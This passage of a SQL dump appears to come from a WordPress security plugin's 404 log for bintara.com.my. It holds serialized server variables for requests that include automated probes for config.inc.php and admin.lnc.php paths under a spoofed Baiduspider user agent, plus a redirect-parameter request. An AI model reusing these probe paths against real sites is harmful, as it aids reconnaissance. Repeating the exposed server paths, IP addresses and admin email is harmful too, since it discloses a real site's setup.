+http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"134.212.220.32\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:59:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:65:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:60:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:63:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XHuBT1onqG4TOWhlEyAAAARY\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XHuBT1onqG4TOWhlEyAAAARY\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XHuBT1onqG4TOWhlEyAAAARY\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XHuBT1onqG4TOWhlEyAAAARY\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XHuBT1onqG4TOWhlEyAAAARY\";s:19:\"REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XHuBT1onqG4TOWhlEyAAAARY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"51022\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:10:\"SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XHuBT1onqG4TOWhlEyAAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674462.1474\";s:12:\"REQUEST_TIME\";s:10:\"1570674462\";}}','notice','2019-10-10 02:27:43','2019-10-10 02:27:42',35063672,36856904,'https://bintara.com.my/bbs/utility/convert/data/config.inc.php',1,0,'134.212.220.32'),(27802,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:65:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/ads/admin/admin.lnc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"21.31.140.156\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=b1f9492c59fc212699a9e537be8b36ec\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"21.31.140.156\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/ads/admin/admin.lnc.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/ads/admin/admin.lnc.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XDeBT1onqG4TOWhlEuQAAARQ\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/ads/admin/admin.lnc.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/ads/admin/admin.lnc.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XDeBT1onqG4TOWhlEuQAAARQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/ads/admin/admin.lnc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/ads/admin/admin.lnc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XDeBT1onqG4TOWhlEuQAAARQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/ads/admin/admin.lnc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/ads/admin/admin.lnc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XDeBT1onqG4TOWhlEuQAAARQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"50367\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/ads/admin/admin.lnc.php\";s:10:\"SCRIPT_URL\";s:24:\"/ads/admin/admin.lnc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XDeBT1onqG4TOWhlEuQAAARQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570674445.986\";s:12:\"REQUEST_TIME\";s:10:\"1570674445\";}}','notice','2019-10-10 02:27:28','2019-10-10 02:27:26',35055400,36861288,'https://bintara.com.my/ads/admin/admin.lnc.php',1,0,'21.31.140.156'),(27801,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:71:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:36:\"/utility/convert/data/config.inc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:11:\"53.210.12.2\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d63a04ef052c3c12634dad5e71b18e53\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"53.210.12.2\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6WzOBT1onqG4TOWhlEfAAAAQk\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6WzOBT1onqG4TOWhlEfAAAAQk\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6WzOBT1onqG4TOWhlEfAAAAQk\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6WzOBT1onqG4TOWhlEfAAAAQk\";s:19:\"REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6WzOBT1onqG4TOWhlEfAAAAQk\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"64566\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:58:\"https://bintara.com.my/utility/convert/data/config.inc.php\";s:10:\"SCRIPT_URL\";s:36:\"/utility/convert/data/config.inc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6WzOBT1onqG4TOWhlEfAAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674380.8954\";s:12:\"REQUEST_TIME\";s:10:\"1570674380\";}}','notice','2019-10-10 02:26:22','2019-10-10 02:26:21',35073560,36884488,'https://bintara.com.my/utility/convert/data/config.inc.php',1,0,'53.210.12.2'),(27800,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"7F7F60E3-8E0D-4AB4-B6BE-19FBBE7C2D70\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6KaoW0BuA@f-VjsznNawAAAFY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.132.144.1\";s:11:\"REMOTE_PORT\";s:5:\"50291\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6KaoW0BuA@f-VjsznNawAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570671210.9098\";s:12:\"REQUEST_TIME\";s:10:\"1570671210\";}}','notice','2019-10-10 01:33:33','2019-10-10 01:33:31',35789248,37587720,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.1'),(27799,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"DADE9B00-81DA-4610-822D-9941E41DFBC6\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6FwYW0BuA@f-VjsznLmAAAAFQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.132.144.1\";s:11:\"REMOTE_PORT\";s:5:\"49791\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6FwYW0BuA@f-VjsznLmAAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570670017.6437\";s:12:\"REQUEST_TIME\";s:10:\"1570670017\";}}','notice','2019-10-10 01:13:40','2019-10-10 01:13:38',35789912,37592312,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.1'),(27798,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/B08C390C\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"53378\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ55ToW0BuA@f-VjsznFmwAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570666830.7926\";s:12:\"REQUEST_TIME\";s:10:\"1570666830\";}}','notice','2019-10-10 00:20:32','2019-10-10 